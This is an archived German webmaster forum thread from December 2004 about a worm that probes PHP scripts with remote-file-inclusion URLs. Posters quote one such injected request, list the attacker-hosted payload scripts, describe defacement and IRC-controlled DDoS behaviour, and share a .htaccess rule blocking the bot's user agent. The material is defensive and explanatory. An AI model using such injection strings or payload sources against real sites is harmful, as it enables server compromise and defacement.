ABAKUS

Ihr Partner in Sachen SEO und Online Marketing
https://archiv.abakus-internet-marketing.de/foren/

Script Kiddys ???

https://archiv.abakus-internet-marketing.de/foren/viewtopic.php?f=36&t=10127

Seite 1 von 2

Script Kiddys ???

Verfasst: 25.12.2004, 14:29
von Ice Man
Also ich bekomme seit heute immer die Fehlermeldung, das einer meiner Unterseiten mit dieser Variable aufgerufen wird

click.php?id= (da kommt normalerweise eine meiner IDs )

aber nun kommt immer das

out-click.php?id=https://www.visualcoders.net/spy.gif?&c ... %20php.txt


Ist doch nicht normal oder ?

das gif ist auch etwas komisch, schaut selbst

[www.visualcoders.net/spy.gif]

Kann mir einer sagen was das bedeutet ?

Verfasst:
von
SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002
  • persönliche Betreuung
  • individuelle Beratung
  • kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.

Verfasst: 25.12.2004, 14:33
von Christophe
Jemand versucht dich zu hacken. Bei sauber geschriebenen Scripten hat das keine Chance.

Verfasst: 25.12.2004, 14:41
von treo
naja, es ist ein bot der das ganze macht.
Ich hab den etwa 4 mal heute da gehabt,
er kommt aber nicht durch ;)

Verfasst: 25.12.2004, 14:42
von Ice Man
Bin scheinbar nicht der einzigste

https://www.visualcoders.net/viewtopic.php?t=94

Da schreiben viele, das bei denen das selbe ist.
Möglich das deren Forum infiziert von einem Wurm ist, scheinbar haben die ne Version <2.0.11

Verfasst: 25.12.2004, 14:50
von sean
@Ice Man

Das kommt bei mir auch öfter vor. Wenn man eine print.php, redirect.php oder mailto.php hat versuchen einige darüber andere Webseiten zu laden oder Emails zu versenden.

Man muß das entsprechend absichern, sonst wird über die Scripte gespammt.

sean

Verfasst: 25.12.2004, 14:56
von treo
ja, das muss man, man sollte niemals den Eingaben eines Users vertrauen.

übrigends: ladet euch doch mal das runter was der bot runterladen wollte, man kann ihn so recht gut analysieren weil ja alles als perlscript daher kommt :D

Verfasst: 25.12.2004, 15:33
von Pompom
Die versuchen über php mehrere Scripts auf deinen Server zu laden, mit denen
sie herausbekommen können, ob dies geklappt hat.
Wenn: Dann können sie dir auch die "richtigen" Programm unterschieben.

Diese Scripts sind:
https://www.visualcoders.net/spybot.txt
https://www.visualcoders.net/worm1.txt
https://www.visualcoders.net/php.txt
https://www.visualcoders.net/ownz.txt
https://www.visualcoders.net/zone.txt

Wenn es geklappt hat, findest du diese im Verzeichnis
/tmp

Verfasst: 25.12.2004, 15:41
von Pompom
https://www.visualcoders.net/ownz.txt ist übrigens ein Script zum Deface.
Alle index-Dateien (im /home-Pfad) werden mit

"spykids ownz your server" verziert.

Kann dann z.B. so nett aussehen: https://exce.free.fr/

Verfasst: 25.12.2004, 17:13
von Ice Man
ich hab mal ebend folgendes in die -htacces eingetragen

RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple [OR]

damit sollte der Spuck vorerst beendet sein

Verfasst: 25.12.2004, 17:39
von treo
ich habe mir den Wurm mal genauer angeschaut,
wie genau er reinkommt weiß ich bis jetzt zwar immer noch nicht, aber ich weiß was er anstellt wenn er dann mal drin ist,
neben dem Defacement verbindet er sich auch auf einen IRC Server und wartet dann auf aufträge, so kann er z.b. ein DDoS starten.
Außerdem startet er sich nochmal selbst und verbreitet sich weiter,
es wird dabei aber immer nur auf visualcoders.net als quelle zugegriffen um sich zu kopieren

Verfasst: 25.12.2004, 19:34
von Ice Man
sie wie es im Moment ausschaut, wurde die Seite entweder tot gelegt oder der Server ist zusammen gebrochen oder wurde abgeschaltet.

Jedenfalls ist aktuell nix mehr da .... :)

Verfasst: 25.12.2004, 19:45
von treo
ich hab heute morgen ja auch ne mail bei heise gelassen deswegen, bzw. auch ein bisschen Koresspondenz gehalten
Nun gibts auch die passende Tickermeldung:
https://www.heise.de/newsticker/meldung/54623

Verfasst: 26.12.2004, 19:10
von Moddy
der Wurm dürfte es schwer haben jetzt noch Opfer zu finden, Google hat die abbbfrage Allinurl:Viewtopic.php gestern gesperrt :)

Edit, ur die Abfrage allinurl:viewtopic.php wurde gesperrt, also klein geschrieben :-?

Verfasst: 27.12.2004, 10:10
von stp69
Moin,

auch ich wurde "Opfer" von den htacces .net anfragen. Mein Provider stönte am 2 Weihnachtstag und musste in der Nacht von 25 auf den 26 wohl angeblich wegen mir den Server runterfahren.... obgleich da nur ne kleine XT-Commerce löaung läuft :)

Mein Provider bat mich den Shop upzudaten. Ich werd mal die oben von Ice Man angesprochene Zeile in die htacces eintragen... hoffentlich hilft es.

Gruß
Stephan

Verfasst: 27.12.2004, 16:00
von opetzold
stp69 hat geschrieben:Moin,
Mein Provider stönte am 2 Weihnachtstag und musste in der Nacht von 25 auf den 26 wohl angeblich wegen mir den Server runterfahren.... obgleich da nur ne kleine XT-Commerce löaung läuft :)

Mein Provider bat mich den Shop upzudaten.
Hallo,

IHMO hat dir dein Provider Unsinn erzählt. Ich habe sogar noch die 1 Jahr alte BETA von XTC als Shop laufen und diese hat einen Ansturm von mehreren Bots seit Tagen problemlos überstanden.

Die Idee mit der htacces werde ich trotzdem mal auch probieren.

Gruß Olaf
Alle Zeiten sind UTC+01:00
Seite 1 von 2

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de